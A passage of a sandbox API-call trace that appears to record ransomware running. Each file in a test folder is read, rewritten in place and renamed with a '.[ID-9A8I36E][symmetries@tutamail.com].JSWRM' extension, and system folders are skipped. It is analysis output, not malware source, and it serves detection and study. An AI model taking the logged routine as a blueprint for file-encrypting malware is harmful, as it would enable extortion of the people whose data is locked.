nNumberOfBytesToWrite=0xa070, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0xa070, lpOverlapped=0x0) returned 1 [0062.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.739] CloseHandle (hObject=0x450) returned 1 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0062.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0062.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0062.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0062.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.741] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), lpNewFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0062.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0062.741] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2=".") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="..") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="...") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="windows") returned -1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="recovery") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="perflogs") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="documents and settings") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="$RECYCLE.BIN") returned 1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="system volume information") returned -1 [0062.741] lstrcmpiW (lpString1="sqmapi.dll", lpString2="msocache") returned 1 [0062.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0062.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x345f978, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqmapi.dll", lpUsedDefaultChar=0x0) returned 10 [0062.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0062.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x345f948, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqmapi.dll", lpUsedDefaultChar=0x0) returned 10 [0062.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0062.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0062.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0062.742] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2=".") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="..") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="...") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="windows") returned -1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="recovery") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="perflogs") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="documents and settings") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="$RECYCLE.BIN") returned 1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="system volume information") returned -1 [0062.742] lstrcmpiW (lpString1="Strings.xml", lpString2="msocache") returned 1 [0062.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Strings.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Strings.xml", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Strings.xml", lpUsedDefaultChar=0x0) returned 11 [0062.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0062.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Strings.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Strings.xml", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Strings.xml", lpUsedDefaultChar=0x0) returned 11 [0062.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0062.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0062.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0062.742] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.743] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=14084) returned 1 [0062.743] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3700) returned 0x23cc80 [0062.743] ReadFile (in: hFile=0x450, lpBuffer=0x23cc80, nNumberOfBytesToRead=0x3700, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x23cc80*, lpNumberOfBytesRead=0x345f63c*=0x3700, lpOverlapped=0x0) returned 1 [0062.747] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.747] WriteFile (in: hFile=0x450, lpBuffer=0x23cc80*, nNumberOfBytesToWrite=0x3700, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x23cc80*, lpNumberOfBytesWritten=0x345f638*=0x3700, lpOverlapped=0x0) returned 1 [0062.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0062.747] CloseHandle (hObject=0x450) returned 1 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0062.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0062.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225d30 [0062.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0062.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0062.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225d30 | out: hHeap=0x1e0000) returned 1 [0062.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.748] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), lpNewFileName="C:\\588bce7c90097ed212\\Strings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\strings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0062.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0062.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0062.749] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2=".") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="..") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="...") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="windows") returned -1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="recovery") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="perflogs") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="documents and settings") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$RECYCLE.BIN") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="system volume information") returned 1 [0062.749] lstrcmpiW (lpString1="UiInfo.xml", lpString2="msocache") returned 1 [0062.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0062.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x345f978, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UiInfo.xml", lpUsedDefaultChar=0x0) returned 10 [0062.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0062.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0062.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x345f948, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UiInfo.xml", lpUsedDefaultChar=0x0) returned 10 [0062.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0062.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0062.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0062.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0062.750] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.750] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=38898) returned 1 [0062.750] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x97f0) returned 0x2471a8 [0062.750] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x97f0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x97f0, lpOverlapped=0x0) returned 1 [0062.756] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.756] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x97f0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x97f0, lpOverlapped=0x0) returned 1 [0062.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.756] CloseHandle (hObject=0x450) returned 1 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0062.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0062.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226730 [0062.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0062.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0062.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226730 | out: hHeap=0x1e0000) returned 1 [0062.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.758] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), lpNewFileName="C:\\588bce7c90097ed212\\UiInfo.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0062.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0062.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0062.759] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2=".") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="..") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="...") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="windows") returned -1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="recovery") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="perflogs") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="documents and settings") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="$RECYCLE.BIN") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="system volume information") returned 1 [0062.759] lstrcmpiW (lpString1="watermark.bmp", lpString2="msocache") returned 1 [0062.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0062.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="watermark.bmp", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="watermark.bmp", cchWideChar=13, lpMultiByteStr=0x345f978, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="watermark.bmp", lpUsedDefaultChar=0x0) returned 13 [0062.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0062.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0062.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="watermark.bmp", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="watermark.bmp", cchWideChar=13, lpMultiByteStr=0x345f948, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="watermark.bmp", lpUsedDefaultChar=0x0) returned 13 [0062.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0062.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0062.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0062.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0062.759] CreateFileW 